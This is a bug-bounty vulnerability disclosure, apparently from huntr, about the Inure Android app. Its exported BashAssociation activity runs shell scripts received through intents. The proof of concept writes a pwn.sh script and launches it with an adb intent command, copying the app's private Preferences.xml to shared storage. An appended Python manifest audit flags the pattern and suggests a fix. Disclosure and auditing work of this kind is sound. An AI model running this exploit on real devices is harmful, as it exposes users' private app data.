huntr: 1875EE85-4B92-4AA4-861E-094137A29276 (blackbeard666)
Aug 13, 2023 - 5:48 a.m.

Theft of Arbitrary Files due to execution of attacker scripts from BashAssociation.kt

2023-08-13 05:48:01
blackbeard666
www.huntr.dev
inure application
security flaw
execution
malicious scripts
file theft
proof of concept
bashassociation.kt
intent data
exfiltration
vulnerability
sdcard directory
pwn toolkit
apk
bug bounty

EPSS: 0.001 (Low), percentile 20.7%

Description

Tested on Build87 of the Inure application. It was discovered that the application had an exported activity (app.simple.inure.activities.association.BashAssociation) which accepted intent data with the file scheme and the text/x-shellscript MIME type, and executed the commands contained in the opened file via RunScript.java.

Since this activity is exported, an installed malicious application can send an intent to it in order to execute malicious commands. In this particular case, it was possible to retrieve files from the vulnerable application's internal directory (/data/data/app.simple.inure/) and exfiltrate them to /sdcard, where the attacker could read the retrieved information.

Proof of Concept

  1. Set up a directory on the sdcard:
PS C:\Users\Acer> adb shell  
angelica:/ $ cd /sdcard  
angelica:/sdcard $ mkdir inure-proof-of-concept  
angelica:/sdcard $ cd inure-proof-of-concept/  
angelica:/sdcard $ echo "cp /data/data/app.simple.inure/shared_prefs/Preferences.xml /sdcard/inure-proof-of-concept/inure-exfiltrated.xml" > pwn.sh  
angelica:/sdcard/inure-proof-of-concept $ ls -la  
total 10  
drwxrwx--x 2 root sdcard_rw 3488 2023-08-13 13:32 .  
drwxrwx--x 51 root sdcard_rw 3488 2023-08-13 13:31 ..  
-rw-rw---- 1 root sdcard_rw 113 2023-08-13 13:32 pwn.sh
  2. Perform the attack via an adb command:
PS C:\Users\Acer\Desktop\pwn-toolkit\apks\app.simple.inure> adb shell am start -a android.intent.action.VIEW -d "file:///sdcard/inure-proof-of-concept/pwn.sh" -n app.simple.inure/.activities.association.BashAssociation  
Starting: Intent { act=android.intent.action.VIEW dat=file:///sdcard/inure-proof-of-concept/pwn.sh cmp=app.simple.inure/.activities.association.BashAssociation }
  3. Review the files in the directory we created in step 1; we can see that the Preferences.xml file was exfiltrated:
angelica:/sdcard/inure-proof-of-concept $ ls -la  
total 14  
drwxrwx--x 2 root sdcard_rw 3488 2023-08-13 13:34 .  
drwxrwx--x 51 root sdcard_rw 3488 2023-08-13 13:31 ..  
-rw-rw---- 1 root sdcard_rw 1119 2023-08-13 13:34 inure-exfiltrated.xml  
-rw-rw---- 1 root sdcard_rw 113 2023-08-13 13:32 pwn.sh  
angelica:/sdcard/inure-proof-of-concept $ cat inure-exfiltrated.xml  
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>  
<map>  
<boolean name="apk_external_storage" value="false" />  
<boolean name="is_external_storage" value="false" />  
<int name="app_accent_color" value="-29592" />  
<int name="main_app_launch_count" value="5" />  
<boolean name="is_custom_color" value="false" />  
<int name="view_positions" value="7" />  
<boolean name="disclaimer_agreed" value="true" />  
<string name="last_search_keyword"></string>  
<string name="crashCause">android.system.ErrnoException: open failed: ENOENT (No such file or directory)</string>  
<string name="home_path">/data/user/0/app.simple.inure/app_HOME</string>  
<string name="crash_message">java.lang.RuntimeException: Unable to start activity ComponentInfo{app.simple.inure/app  
.simple.inure.activities.association.BashAssociation}: java.io.FileNotFoundException: /sdcard/inure-proof-of-concept/inu  
re-root-id-test.sh: open failed: ENOENT (No such file or directory)</string>  
<long name="crash_timestamp" value="1691896905717" />  
<boolean name="deep_search_keyword_mode" value="false" />  
</map>
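
The root cause described above (an exported activity that accepts text/x-shellscript data and runs it) can be caught by reviewing the decoded manifest. The following check is an added example, not code from the report or from the Inure project; the sample manifest, its package name, activity names and permission name are constructed for illustration.

```python
import xml.etree.ElementTree as ET

NS = "{http://schemas.android.com/apk/res/android}"
SCRIPT_MIMES = {"text/x-shellscript", "application/x-sh", "text/*", "*/*"}

# Constructed sample in decoded-manifest form (e.g. apktool output); it mirrors the
# report's description and is not copied from Inure's real AndroidManifest.xml.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.demo">
  <application>
    <activity android:name=".ScriptRunnerActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <data android:scheme="file" android:mimeType="text/x-shellscript" />
      </intent-filter>
    </activity>
    <activity android:name=".GuardedRunnerActivity" android:exported="true"
              android:permission="com.example.demo.RUN_SCRIPT">
      <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <data android:scheme="content" android:mimeType="text/x-shellscript" />
      </intent-filter>
    </activity>
    <activity android:name=".InternalRunnerActivity" android:exported="false">
      <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <data android:scheme="file" android:mimeType="text/x-shellscript" />
      </intent-filter>
    </activity>
  </application>
</manifest>"""

def audit_script_handlers(manifest_xml):
    """Return (activity, scheme, mimeType) for exported, permission-less script handlers."""
    findings = []
    for activity in ET.fromstring(manifest_xml).iter("activity"):
        # Only explicit android:exported="true" is checked here; implicit export of
        # filtered components in apps targeting below API 31 is out of scope.
        if activity.get(NS + "exported") != "true" or activity.get(NS + "permission"):
            continue  # not reachable by other apps, or gated (protection level needs review)
        for data in activity.iter("data"):
            mime = data.get(NS + "mimeType")
            if mime in SCRIPT_MIMES:
                findings.append((activity.get(NS + "name"), data.get(NS + "scheme"), mime))
    return findings

if __name__ == "__main__":
    for name, scheme, mime in audit_script_handlers(SAMPLE_MANIFEST):
        print(f"REVIEW {name}: exported, no permission, accepts {scheme}:// {mime}")
```

A finding means any installed app can hand the activity a script path; the fix is to set android:exported="false", or to require a signature-level permission and explicit user confirmation before anything is executed.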
